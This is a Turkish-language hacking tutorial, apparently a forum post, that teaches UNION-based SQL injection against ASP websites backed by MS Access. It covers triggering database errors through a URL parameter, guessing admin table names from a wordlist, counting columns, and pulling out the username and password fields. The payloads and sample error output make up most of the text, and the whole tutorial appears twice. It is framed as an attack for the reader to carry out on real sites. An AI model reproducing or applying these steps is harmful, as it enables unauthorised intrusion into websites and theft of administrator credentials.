Biliyorum çoğunuz değişik yontem kullaniyosunuz ama bunu okuyun mutlak isinize
yarar
Örnek
Hedef: www.xxxx.com/newsdetails.asp?id=23
Şimdi sitenin sonuna hata almak için =-2 koyun,eğer alltaki gibi bir hata alıyorsanız site %60 açıkıtır
www.xxxx.com/newsdetails.asp?id=23=-2
Sonuç:
ADODB.Field error '80020009'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/haber/devami.asp, line 0
Artık sitenin açık olduğunu biliyoruz,şimdi union komutunu kullanarak doğru tablo ismini bulmalıyız
Komut: union select 0,1 from tabloismi
Tablo ismleri olabilcek şeyler:
user
username
member
membername
login
password
pass
uye
uyeler
yonetici
admin
Şimdi kullancağımız komut şu:
union select 0,1 from admin
Eğer doğru tablonu bulmuşsak altaki gibi bir hata alırız
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/haber/devami.asp, line 8
Eğer bulamadiysaniz,tablo isimleri uyuşmuyodur
Şimdi artık sayıyları tek tek artırarak kullaniciadi ve şifrenin nerde sakli olcağina bakcaz
Komut
union select 0,1,hep artcak taki hata almayıncaya kadar 1 sayı artırın from admin
Örnek
union select 0,1,2,3,4,5,6,7 from admin
Eğer böle hata alıyorsaniz sayı artırmaya devam edin
The number of columns in the two selected tables or queries of a union query do not match.
Hata almadiniz ve 1 sayı çıktı.Bunun anlamı kullanicadi ve sifre 1 kolonda sakli yani
kullancagimiz komut.Yalnız kolonlarda deneme yanılma yöntemini kullanabiliriz veya
admin paneline gidip sayfanın kaynağından anlayabilirsiniz
Komut:
union select 0,kullaniciadi,2,3,4,5....
union select 0,sifre,2,3,4,5.............
yarar
Örnek
Hedef: www.xxxx.com/newsdetails.asp?id=23
Şimdi sitenin sonuna hata almak için =-2 koyun,eğer alltaki gibi bir hata alıyorsanız site %60 açıkıtır
www.xxxx.com/newsdetails.asp?id=23=-2
Sonuç:
ADODB.Field error '80020009'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/haber/devami.asp, line 0
Artık sitenin açık olduğunu biliyoruz,şimdi union komutunu kullanarak doğru tablo ismini bulmalıyız
Komut: union select 0,1 from tabloismi
Tablo ismleri olabilcek şeyler:
user
username
member
membername
login
password
pass
uye
uyeler
yonetici
admin
Şimdi kullancağımız komut şu:
union select 0,1 from admin
Eğer doğru tablonu bulmuşsak altaki gibi bir hata alırız
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/haber/devami.asp, line 8
Eğer bulamadiysaniz,tablo isimleri uyuşmuyodur
Şimdi artık sayıyları tek tek artırarak kullaniciadi ve şifrenin nerde sakli olcağina bakcaz
Komut
union select 0,1,hep artcak taki hata almayıncaya kadar 1 sayı artırın from admin
Örnek
union select 0,1,2,3,4,5,6,7 from admin
Eğer böle hata alıyorsaniz sayı artırmaya devam edin
The number of columns in the two selected tables or queries of a union query do not match.
Hata almadiniz ve 1 sayı çıktı.Bunun anlamı kullanicadi ve sifre 1 kolonda sakli yani
kullancagimiz komut.Yalnız kolonlarda deneme yanılma yöntemini kullanabiliriz veya
admin paneline gidip sayfanın kaynağından anlayabilirsiniz
Komut:
union select 0,kullaniciadi,2,3,4,5....
union select 0,sifre,2,3,4,5.............
